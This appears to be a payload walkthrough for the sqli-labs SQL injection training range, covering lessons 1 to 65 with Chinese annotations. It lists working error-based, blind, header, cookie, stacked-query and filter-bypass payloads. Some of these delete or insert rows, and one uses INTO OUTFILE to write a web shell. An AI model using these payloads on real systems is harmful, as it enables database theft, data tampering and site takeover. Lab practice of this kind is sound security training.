Lesson-1
GET - Error based - Single quotes - String(基于错误的单引号注入)
?id=1’
?id=1’%23
Lesson-2
GET - Error based - Intiger based(基于错误的GET整型注入)
?id=1 and 1=1
?id=1 and 1=2
Lesson-3
GET - Error based - Single quotes with twist - string(基于错误的GET单引号变形注入)
?id=1’
?id=1’ and ‘1’='2
Lesson-4
GET - Error based - Double Quotes - String(基于错误的GET双引号注入)
?id=1" and “1”=“1
?id=1” and “1”="2
Lesson-5
GET - Double injection -Single Quotes -String(双注入GET单引号注入)
?id=1’ and updatexml(1,concat(0x7e,version(),0x7e),1)%23
?id=1’ or extractvalue(1, concat(0x7e, version())) %23
Lesson-6
GET - Double injection - Double Quotes - String(双引号的双注入)
?id=1" and updatexml(1,concat(0x7e,version(),0x7e),1)%23
Lesson-7
GET - Dump into outfile - String(导出文件GET型注入)
前提:my.ini配置secure_file_priv=’’ 和 tmpdir=“C:/phpstudy/PHPTutorial/WWW”
?id=1 union select null,null,’’%20 into outfile “C:/phpstudy/PHPTutorial/WWW/sqli-labs/eval.php” – +
Lesson-8
GET - Blind - Boolian Based - Single Quotes(bool型单引号盲注)
1’ and length(database()) > 4 and ‘1’ = '1
Lesson-9
GET - Blind - Time based - Single Quotes(基于时间延迟的单引号盲注)
时间盲注
?id=1’ and sleep(5) – +
?id=1’ and if(length(database())=8, sleep(5), 1)%20 – + 猜库长度
?id=1’ and if(left(database(), 1)=‘s’, sleep(5), 1)%20 – + 猜库名
Lesson-10
GET blind - Time based - double quotes(基于时间延迟的双引号盲注)
?id=1" and sleep(5) – +
Lesson-11
POST - Error Based - Single quotes String(基于错误的POST单引号注入)
uname=admin’ and extractvalue(1, concat(0x7e,(select database()))) and ‘1’=‘1&passwd=123456&submit=Submit 猜库名
uname=admin’ and extractvalue(1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and ‘1’='1&passwd=123456&submit=Submit 猜表名
Lesson-12
POST - Error Based - Double quotes - String - with twist(基于错误POST双引号双注入)
双引号+括号 select * from xxx where uname = ( u n a m e ) a n d p a s s w d = ( uname) and passwd = ( uname)andpasswd=(passwd);
uname=1&passwd=1") union select database(), 2 or ("1&submit=Submit
Lesson-13
POST - Double Injection - Single quotes - String - with twist(POST单引号变形双注入)
单引号+括号
uname=admin’) or (‘1&passwd=admin&submit=Submit
uname=admin’) and updatexml(1,concat(0x7e,version(),0x7e),1) or ('1&passwd=admin&submit=Submit 获得版本号
Lesson-14
POST - Double injection - Single quotes - String -with twist(POST单引号变形双注入)
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
Lesson-15
POST - Blind - Boolian/time Based - Single quotes(基于bool型/时间延迟的单引号POST盲注)
uname=admin’ and sleep(5) – 1&passwd=ds&submit=Submit
uname=admin’ and if(length(database())=8,sleep(5),1)–+&passwd=admin&submit=Submit 爆库长度
uname=admin’ and if(substr(database(),1,1)=‘s’,sleep(5),1)–+&passwd=admin&submit=Submit 爆库
uname=admin’ and if( substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)=‘r’ ,sleep(5),1)–+&passwd=admin&submit=Submit 爆表
uname=admin’ and if(substr((select column_name from information_schema.columns where table_name=‘users’ limit 4,1),8,1)=‘password’ ,sleep(5),1)–+&passwd=admin&submit=Submit 爆字段
uname=admin’ and if(substr((select password from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1,1)–+&passwd=admin&submit=Submit 爆password
uname=admin’ and if(substr((select username from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1,1)–+&passwd=admin&submit=Submit 爆username
Lesson-16
POST-Blind-Boolian/Time Based - Double quotes(基于bool型/时间延迟的双引号POST盲注)
双引号
Lesson-17
POST-Update Query - Error Based - String(基于错误的更新操作POST注入)
前提:uanme必须正确
uname=admin&passwd=admin’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and column_name not in (‘user_id’,‘user’,‘first_name’,‘last_name’,‘avatar’,‘last_login’,‘failed_login’)),0x7e),1) --+ &submit=Submit
Level-18
POST - Header Injection - Uagent field - Error Based(基于错误的User Agent头部POST注入)
前提:uname,passwd必须输入正确
User-Agent: ’ and updatexml(1, concat(0x7e, (select database()), 0x7e)) and ’
uname=admin&passwd=admin&submit=Submit
Level-19
POST-Header Injection - Referer field - Error based(基于错误的Referer头部POST注入)
前提:uname,passwd必须输入正确
Referer: ’ and extractvalue(1, concat(0x7e, (database()), 0x7e)) and ’
uname=admin&passwd=admin&submit=Submit
Level-20
POST-Cookie Injection - Uagent field error based(基于错误的Cookie头部POST注入)
Cookie: uname=admin’ and extractvalue(1, concat(0x7e, database(), 0x7e)) and ’
Level-21
Cookie Injection - base64 encoded-single quotes and parenthesis(基于cookie的base64值的单引号注入)
admin’) union select 1,2,database()#
COOKIE:uname=LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==
Level-22
Cookie injection - base64 encoded -double quotes(基于cookie的base64值的双引号注入)
admin" and extractvalue(1, concat(0x7e,database(),0x7e)) #
COOKIE:uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSwgY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSkgIw==
Level-23
GET - Error based - trip comments(基于报错的过滤注释符的GET注入)
过滤注释符,用闭合绕过
?id=0’ union select database(), @@basedir,user() and ’
Level-24
POST - Second order injection Real treat - Stored injections
注册、登录、修改密码三个功能
首先,注册一个账号admin’#,密码xiaoming
然后使用admin’#登录账号
最后修改新密码,就是admin的新密码
Level-25
GET -Error based - All your OR & AND belong to us -string single quote(基于报错的过滤and,or的单引号注入)
Anandd oorr 绕过
?id=1’ AANDND extractvalue(1, concat(0x7e, database(), 0x7e) ) Aandnd ‘1’='1
Level-25a
GET - blind based - All your or & and belong to us - integer based(过滤掉or, and符号的数字型盲注)
?id=-1 union select 1,database(),3
Level-26
GET -Error based All your spaces and comments belong to us(基于报错的过滤掉空格和注释符的注入)
过滤掉空格、注释符、/等
?id=0’||updatexml(1,concat(0x7e,database(),0x7e),0)||'1
Level-26a ???
GET - Blind based - All your SPACES and COMMENTS belong to us - String-single quotes-Parenthesis(基于报错的过滤空格/注释符的GET单引号盲注)
?id=1’)union%a0select%a01,user(),3||('1
?id=100%27)%a0union%a0select%a01,database(),3%a0aandnd%a01=(%271
Level-27
GET-Error Based - All your UNION & SELECT Belong to us - String Single quote(基于报错的过滤UNION&SELECT字符的单引号注入)
?id=1’%26%26extractvalue(1,concat(0x7e,SELECT(database()),0x7e))%26%26’1’='1
Level-27a
GET - Blind Based - All your UNION & SELECT Belong to us - Double Quotes(基于报错的过滤UNION&SELECT字符的单引号注入)
?id=0"%0AUNIon%0ASELECt%0A1,database(),3||“1”="1
Level-28
GET -Error Based - All your UNION & SELECT Belong to us -String-Single quote with parenthesis(基于报错的过滤掉UNION&SELECT的带括号的单引号注入)
?id=0’)%0Aununion%0Aselection%0Aselect%0A1,database(),2||(‘1’='1
Level-28a
GET-Blind Based - All your UNION&SELECT Belong to us - single quote - parenthesis(过滤SELECT&UNION字符带括号的单引号盲注)
?id=0’)%0Aununion%0Aselection%0Aselect%0A1,@@datadir,2||('1
Level-29
GET-Error based - IMPIDENCE MSMATCH - Having a WAF in front of web application(带WAF防火墙的报错注入)
?id=0’ union select 1,@@datadir,database() – 1
Level-30
GET - Blind - IMPIDENCE MISMATCH - Having a WAF in front of web application(带WAF防火墙的盲注)
?id=1" and length(database()) >7 and "1
Level-31
GET - Blind - IMPIDENCE MISMATCH - Having a WAF in front of web application(带WAF防火墙的盲注)
?id=1" and length(database()) > 7 and "1
Level-32
GET - Bypass custom filter adding slashes to dangerous chars(绕过斜杠过滤特殊符号过滤器)
宽字节绕过引号转义,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6’ 这样的构造时,’ 前面加的 \ 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 \ 的作用
?id=0%E6%27%20union%20select%201,database(),user()%20–%201
Level-33
GET - Bypass AddSlashes() (GET方式绕过addslashes()函数)
?id=0%E6%27%20%20union%20select%20database(),%20user(),%20version()–%20+
Level-34
POST-Bypass AddSlashes()(POST方式绕过addslashes()函数)
uname=12%E6’ union select @@datadir, database() – +&passwd=2&submit=Submit
Level-35
GET-Bypass Add Slashes(we don’t need them) integer based(基于数字的绕过addslashes函数的注入)
?id=0 union select 1, database(), user() and 1=2
Level-36
GET - Bypass MYSQL_real_escape_string(GET方式绕过MYSQL_real_escape_string()函数)
?id=0%E6%27%20%20union%20select%201,database(),2–%201
Levl-37
POST - Bypass MYSQL_real_escape_string(POST方式绕过MYSQL_real_escape_string()函数)
uname=12%E6’ union select @@datadir, database() – +&passwd=2&submit=Submit
Level-38
Future Editions
?id=0’ union select 1, database(), user() – +
或堆叠注入
?id=0’;delete from users where id=17 – + (利用id注入漏洞添加修改删除数据)
PART3
Level-38
GET - Stacked Query Injection - String(堆查询注入)
?id=1’;insert into users(id,username,password) values (77,‘test’,‘test’)–+
Level-39
GET - Stacked Query Injection - Integer based(数字型堆查询注入)
?id=1;insert into users(id,username,password) values (17,‘test’,‘test’)–+
Level-40
GET - Blind based - String - stacked(带括号单引号的堆盲注)
?id=1’);insert into users(id,username,password) values (18,‘test’,‘test’)–+
Level-41
GET - Blind based - Integer - stacked(数字型堆查询注入)
?id=1;insert into users(id,username,password)values(19,‘a’,‘b’) – +
Level-42
POST-Error based -String - Stacked(POST型基于报错的堆注入)
login_user=21&login_password=21’;insert into users(id,username,password)values(20,‘a’,‘b’) – +&mysubmit=Login
Level-43
POST - Error based - String - Stacked with twist(POST型基于报错的变形的堆注入)
login_user=12&login_password=12’);delete from users where id =20 – +&mysubmit=Login
Level-44
POST - Error based - String - Stacked - Blind(POST型基于报错的盲注)
login_user=12&login_password=12’;delete from users where id =19 – +&mysubmit=Login
Level-45
POST-Error based-String -Stacked - Blind(POST型基于报错的盲注)
login_user=12&login_password=2112’);delete from users where id =18 – +&mysubmit=Login
Level-46
GET - Error based - Numeric - ORDER BY CLAUSE(ORDER BY 注入)
?sort=1 and extractvalue(1,concat(0x3c,(select @@datadir))) (结果看源码)
Level-47
GET -Error based String -ORDER BY CLAUSE(基于报错的Oder by 注入)
/?sort=1’ and extractvalue(1,concat(0x3c,(select @@datadir))) and '1
Level-48
GET - Error based - Blind - Numeric - ORDER BY CLAUSE(ORDERBY基于数字的盲注)
?sort=rand(ascii(left(database(),1))=116)
Level-49
GET - Error based - string - blind ORDER BY CLAUSE
1’ and if((ascii(substr(database(),1,1)))>0,sleep(1),1) --+
这里的SLEEP耗时比原来时间要久
Level-50
GET - Error based - ORDER BY CLAUSE - numeric Stacked injection
?sort=rand(ascii(left(database(),1))=115)
Level-51
GET- Error based - ORDER BY CLAUSE - String - Stacked injection
?sort=1’ and updatexml(1,concat(0x7e,database(),0x7e),1)%23
Level-52
GET -Blind based - ORDER BY CLAUSE - numeric Stacked injection
?sort=1;create table less52 like users
Level-53
GET - GET - Blind based - ORDER BY CLAUSE - string stacked injection
?sort=1’;create table less53 like users%23
PART4
Level-54
GET - challenge - Union - 10 queries allowed - Variation 1
?id=0’ union select 1,database(), user()’
Level-55
GET - challenge - Union -14 queries allowed Variation 2
?id=1)%23
?id=0) union select 1,database(),user() %23
Level-56
GET -challenge Union-14 queriees allowed variation 3
?id=0’) union select 1, database(), user() %23
Level-57
GET challenge union-14 queries allowed variation 4
?id=0" union select 1, database(), 3 %23
Level-58
GET challenge Double Query-5 queries allowed variation 1
?id=1’ and updatexml(1, concat(0x7e, database(), 0x7e), 1) %23
Level-59
GET - challenge - double query 5 queries allowed varation 2
?id=99 and updatexml(1,concat(0x7e,database(),0x7e),1)
Level-60
GET - challenge - Double Query -5 queries allowed - variation 3
?id=1"%20 and extractvalue(1,concat(0x7e,database(),0x7e)) and "1
Level-61
GET challenge Double Query -5 quries allowed -variaton 4
?id=1’ and extractvalue(1,concat(0x7e,database(),0x7e)) and '1
Level-62
GET - challenge Blind 130 queries allowed varation 1
?id=1’) and (length(database())=10)%23
Level-63
GET - challenge Blind 130 queries allowed varation 2
?id=1’ and (length(database())=10)%23
Level-64
GET -challenge Blind 130 queries allowed varation 3
?id=1)) and (length(database())=10)%23
Level-65
GET - challenge Blind 130 queries allowed varation 4
?id=1") and (length(database())=10)%23